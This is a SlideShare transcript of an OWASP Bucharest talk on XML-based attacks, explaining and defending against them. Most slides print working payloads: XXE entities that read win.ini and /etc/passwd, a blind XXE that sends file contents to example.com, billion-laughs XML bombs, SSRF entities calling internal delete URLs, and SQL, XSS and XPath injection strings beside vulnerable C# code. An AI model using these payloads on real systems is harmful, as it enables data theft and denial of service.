[Bucharest] XML Based Attacks
0 likes616 views
Daniel Tomescu is a pentester at KPMG Romania and moderator at the Romanian Security Team. He is interested in web/mobile application penetration testing, internal network penetration testing, and mobile/embedded devices. This presentation covers XML-based attacks, including common vulnerabilities like SQL injection and XSS, as well as DTD attacks like XXE and denial of service, XML Schema attacks like SSRF, and XPath injection. The document demonstrates these attacks and discusses how applications can prevent them by configuring XML parsers appropriately.
![About DTDs
Notes.xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note SYSTEM "Notes.dtd">
<note>
<to>Tove</to>
<from>Jani</from>
<heading>Reminder</heading>
<body>Don't forget me this weekend!</body>
</note>
Notes.dtd
<!DOCTYPE note [
<!ELEMENT note (to,from,heading,body)>
<!ELEMENT to (#PCDATA)>
<!ELEMENT from (#PCDATA)>
<!ELEMENT heading (#PCDATA)>
<!ELEMENT body (#PCDATA)>
]>
9](https://image.slidesharecdn.com/xmlbasedattacks-owasp-151026104617-lva1-app6892/85/Bucharest-XML-Based-Attacks-9-320.jpg)
![DTDs : XXE Attacks (1)
Request containing an external entity
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE updateProfile [
<!ENTITY file SYSTEM "file:///c:/windows/win.ini"> ]>
<updateProfile>
<firstname>Joe</firstname>
<lastname>&file;</lastname>
</updateProfile>
10](https://image.slidesharecdn.com/xmlbasedattacks-owasp-151026104617-lva1-app6892/85/Bucharest-XML-Based-Attacks-10-320.jpg)
![DTDs : XXE Attacks (2)
Blind XXE Attack
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE updateProfile [
<!ENTITY % file SYSTEM "file:///c:/windows/win.ini">
<!ENTITY send SYSTEM 'http://example.com/?%file;'> ]>
<updateProfile>
<firstname>Joe</firstname>
<lastname>&send;</lastname>
</updateProfile>
11](https://image.slidesharecdn.com/xmlbasedattacks-owasp-151026104617-lva1-app6892/85/Bucharest-XML-Based-Attacks-11-320.jpg)
![DTDs : Denial of Service (1)
Billion Laughs Attack / XML Bomb
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
12](https://image.slidesharecdn.com/xmlbasedattacks-owasp-151026104617-lva1-app6892/85/Bucharest-XML-Based-Attacks-12-320.jpg)
![XML Bomb variations
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol1 "&lol2;">
<!ENTITY lol2 "&lol1;">
]>
<lolz>&lol1;</lolz>
<?xml version="1.0"?>
<!DOCTYPE kaboom [
<!ENTITY a "aaaaaaaaaaaaaaaaaa...">
]>
<boom>&a;&a;&a;&a;&a;&a;&a;&a;&a;...</boom>
.NET Code fix for XML Bombs
XmlReaderSettings settings = new XmlReaderSettings();
settings.ProhibitDtd = false;
settings.MaxCharactersFromEntities = 1024;
XmlReader reader = XmlReader.Create(stream, settings);
13
DTDs : Denial of Service (2)](https://image.slidesharecdn.com/xmlbasedattacks-owasp-151026104617-lva1-app6892/85/Bucharest-XML-Based-Attacks-13-320.jpg)
![DTDs : SSRF Attacks (1)
Server Side Request Forgery attack example:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE updateProfile [
<!ENTITY ssrf SYSTEM 'http://10.0.0.2/users.php?delete=all'> ]>
<updateProfile>
<firstname>Joe</firstname>
<lastname>&ssrf;</lastname>
</updateProfile>
14](https://image.slidesharecdn.com/xmlbasedattacks-owasp-151026104617-lva1-app6892/85/Bucharest-XML-Based-Attacks-14-320.jpg)
![XML XPath
Notes.xml
<?xml version="1.0" encoding="UTF-8"?>
<bookstore>
<book category="COOKING">
<title lang="it">Everyday Italian</title>
<author>Giada De Laurentiis</author>
<year>2005</year>
<price>30.00</price>
</book>
<book category="CHILDREN">
<title lang="en">Harry Potter</title>
<author>J K. Rowling</author>
<year>2005</year>
<price>19.99</price>
</book>
</bookstore>
XPath expressions
/bookstore/book[1]
/bookstore/book[price>25.00]/title
//title[@lang='en']
/bookstore/book[last()]
19](https://image.slidesharecdn.com/xmlbasedattacks-owasp-151026104617-lva1-app6892/85/Bucharest-XML-Based-Attacks-19-320.jpg)
![XPath Injection
employees.xml
<?xml version="1.0" encoding="utf-8"?>
<Employees>
<Employee ID="1">
<Name>Mike</Name>
<UserName>Mike07</UserName>
<Password>TopSecret</Password>
<Type>Admin</Type>
</Employee>
</Employees>
Payload
Username: Mike07
Password: oops' or 'a'='a
Result - FindUserXPath becomes
//Employee[UserName/text()='Mike07' And Password/text()='oops' or 'a'='a']
C#:
String FindUserXPath;
FindUserXPath =
"//Employee[UserName/text()='"
+ Request("Username")
+ "' And Password/text()='"
+ Request("Password") + "']";
20](https://image.slidesharecdn.com/xmlbasedattacks-owasp-151026104617-lva1-app6892/85/Bucharest-XML-Based-Attacks-20-320.jpg)
![HTTP Request:
POST /update.php HTTP/1.1
Host: target.com
Accept: application/json
Content-Type: application/xml
Content-Length: 228
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE xxe [
<!ENTITY xxe SYSTEM
"file:///etc/passwd" >
]>
<root>
<search>name</search>
<value>&xxe;</value>
</root>
HTTP Response:
HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 2467
{"error": "no results for name
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync....
22
Content-Type header (2)](https://image.slidesharecdn.com/xmlbasedattacks-owasp-151026104617-lva1-app6892/85/Bucharest-XML-Based-Attacks-22-320.jpg)
[Bucharest] XML Based Attacks
- 1. XML Based Attacks Daniel Tomescu 1
- 2. Work and education: Pentester @ KPMG Romania Moderator @ Romanian Security Team Student @ Master of Information Management and Security, UPB Hint: We’re hiring! My interests: Web/mobile application penetration tests Internal network penetration tests Curious about mobile and embedded devices Bug bounty hunter About me 2
- 3. Pentest 101 Input: Our Payload admin’+or+‘1’=‘1’--+ Process: What we are testing Login page Output: (Un)expected result Authentication bypass 3
- 4. Roadmap 1 • XML in a few words 2 • Common vulnerabilities 3 • DTD Attacks 4 • XML Schema Attacks 5 • Xpath Injection 6 • Demo + Q & A 4
- 5. XML Usage • Web apps - XML-RPC; - SOAP; - RSS; • Documents - PDFs; - Office suite; - eBooks; • Mobile apps • Content management 5
- 6. XML Family • Lots of components • Complex structure • Many parsing stages • Parsing errors • Security vulnerabilities? 6
- 7. Common vulnerabilities (1) SQL Injection Classic example: http://target.com/login.php?user=admin&pass=a’+or+’1’=‘1 Equivalent XML Payload: <?xml version="1.0" encoding="UTF-8"?> <root> <user>admin</user> <pass>a’ or ’1’=‘1</pass> </root> 7
- 8. Common vulnerabilities (2) Cross-Site Scripting Classic example: http://example.com/search.php?query=a‛><script>alert(‚123‛)</script> Equivalent XML Payload: <?xml version="1.0" encoding="UTF-8"?> <root> <query>a‛%3E%3Cscript%3Ealert(‚123‛)%3C/script%3E</query> </root> 8
- 9. About DTDs Notes.xml <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE note SYSTEM "Notes.dtd"> <note> <to>Tove</to> <from>Jani</from> <heading>Reminder</heading> <body>Don't forget me this weekend!</body> </note> Notes.dtd <!DOCTYPE note [ <!ELEMENT note (to,from,heading,body)> <!ELEMENT to (#PCDATA)> <!ELEMENT from (#PCDATA)> <!ELEMENT heading (#PCDATA)> <!ELEMENT body (#PCDATA)> ]> 9
- 10. DTDs : XXE Attacks (1) Request containing an external entity <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE updateProfile [ <!ENTITY file SYSTEM "file:///c:/windows/win.ini"> ]> <updateProfile> <firstname>Joe</firstname> <lastname>&file;</lastname> </updateProfile> 10
- 11. DTDs : XXE Attacks (2) Blind XXE Attack <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE updateProfile [ <!ENTITY % file SYSTEM "file:///c:/windows/win.ini"> <!ENTITY send SYSTEM 'http://example.com/?%file;'> ]> <updateProfile> <firstname>Joe</firstname> <lastname>&send;</lastname> </updateProfile> 11
- 12. DTDs : Denial of Service (1) Billion Laughs Attack / XML Bomb <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE lolz [ <!ENTITY lol "lol"> <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"> <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;"> <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"> <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;"> <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;"> <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;"> <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;"> <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;"> <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;"> ]> <lolz>&lol9;</lolz> 12
- 13. XML Bomb variations <?xml version="1.0"?> <!DOCTYPE lolz [ <!ENTITY lol1 "&lol2;"> <!ENTITY lol2 "&lol1;"> ]> <lolz>&lol1;</lolz> <?xml version="1.0"?> <!DOCTYPE kaboom [ <!ENTITY a "aaaaaaaaaaaaaaaaaa..."> ]> <boom>&a;&a;&a;&a;&a;&a;&a;&a;&a;...</boom> .NET Code fix for XML Bombs XmlReaderSettings settings = new XmlReaderSettings(); settings.ProhibitDtd = false; settings.MaxCharactersFromEntities = 1024; XmlReader reader = XmlReader.Create(stream, settings); 13 DTDs : Denial of Service (2)
- 14. DTDs : SSRF Attacks (1) Server Side Request Forgery attack example: <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE updateProfile [ <!ENTITY ssrf SYSTEM 'http://10.0.0.2/users.php?delete=all'> ]> <updateProfile> <firstname>Joe</firstname> <lastname>&ssrf;</lastname> </updateProfile> 14
- 15. DTDs : SSRF Attacks (2) 15
- 16. XML Schema Notes.xml <?xml version="1.0" encoding="UTF-8"?> <note xmlns="http://www.w3schools.com" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation=‚Notes.xsd"> > <to>Tove</to> <from>Jani</from> <heading>Reminder</heading> <body>Don't forget me this weekend!</body> </note> Notes.xsd <?xml version="1.0"?> <xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema"> <xs:element name="note"> <xs:complexType> <xs:sequence> <xs:element name="to" type="xs:string"/> <xs:element name="from" type="xs:string"/> <xs:element name="heading" type="xs:string"/> <xs:element name="body" type="xs:string"/> </xs:sequence> </xs:complexType> </xs:element> </xs:schema> 16
- 17. XML Schema SSRF Server Side Request Forgery attack example: <?xml version="1.0" encoding="utf-8"?> <roottag xmlns="http://10.0.0.1/users.php?delete=all" xmlns:secondaryns="http://10.0.0.2/users.php?delete=all" xmlns:xsi="http://10.0.0.3/users.php?delete=all" xsi:schemaLocation="http://10.0.0.4/users.php?delete=all"> <secondaryns:s> Hello! </secondaryns:s> </roottag> 17
- 18. XML Schema Poisoning attack <?xml version="1.0" encoding="utf-8"?> <xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema"> <xs:element name="note"> <xs:complexType> <xs:sequence> <xs:element name="to" type="xs:string"/> <xs:element name="from" type="xs:string"/> <xs:element name="heading" type="xs:string"/> <xs:element name="body" type="xs:string"/> </xs:sequence> </xs:complexType> </xs:element> </xs:schema> 18
- 19. XML XPath Notes.xml <?xml version="1.0" encoding="UTF-8"?> <bookstore> <book category="COOKING"> <title lang="it">Everyday Italian</title> <author>Giada De Laurentiis</author> <year>2005</year> <price>30.00</price> </book> <book category="CHILDREN"> <title lang="en">Harry Potter</title> <author>J K. Rowling</author> <year>2005</year> <price>19.99</price> </book> </bookstore> XPath expressions /bookstore/book[1] /bookstore/book[price>25.00]/title //title[@lang='en'] /bookstore/book[last()] 19
- 20. XPath Injection employees.xml <?xml version="1.0" encoding="utf-8"?> <Employees> <Employee ID="1"> <Name>Mike</Name> <UserName>Mike07</UserName> <Password>TopSecret</Password> <Type>Admin</Type> </Employee> </Employees> Payload Username: Mike07 Password: oops' or 'a'='a Result - FindUserXPath becomes //Employee[UserName/text()='Mike07' And Password/text()='oops' or 'a'='a'] C#: String FindUserXPath; FindUserXPath = "//Employee[UserName/text()='" + Request("Username") + "' And Password/text()='" + Request("Password") + "']"; 20
- 21. Content-Type header (1) HTTP Request: POST /update.php HTTP/1.1 Host: target.com Accept: application/json Content-Type: application/json Content-Length: 38 {"search":"name","value":‚val"} HTTP Response: HTTP/1.1 200 OK Content-Type: application/json Content-Length: 43 {"error": "no results for name val"} HTTP Request: POST /update.php HTTP/1.1 Host: target.com Accept: application/json Content-Type: application/xml Content-Length: 112 <?xml version="1.0" encoding="UTF-8" ?> <root> <search>name</search> <value>val</value> </root> HTTP Response: HTTP/1.1 200 OK Content-Type: application/json Content-Length: 43 {"error": "no results for name val"} 21
- 22. HTTP Request: POST /update.php HTTP/1.1 Host: target.com Accept: application/json Content-Type: application/xml Content-Length: 228 <?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE xxe [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]> <root> <search>name</search> <value>&xxe;</value> </root> HTTP Response: HTTP/1.1 200 OK Content-Type: application/json Content-Length: 2467 {"error": "no results for name root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync.... 22 Content-Type header (2)
- 24. Questions? 24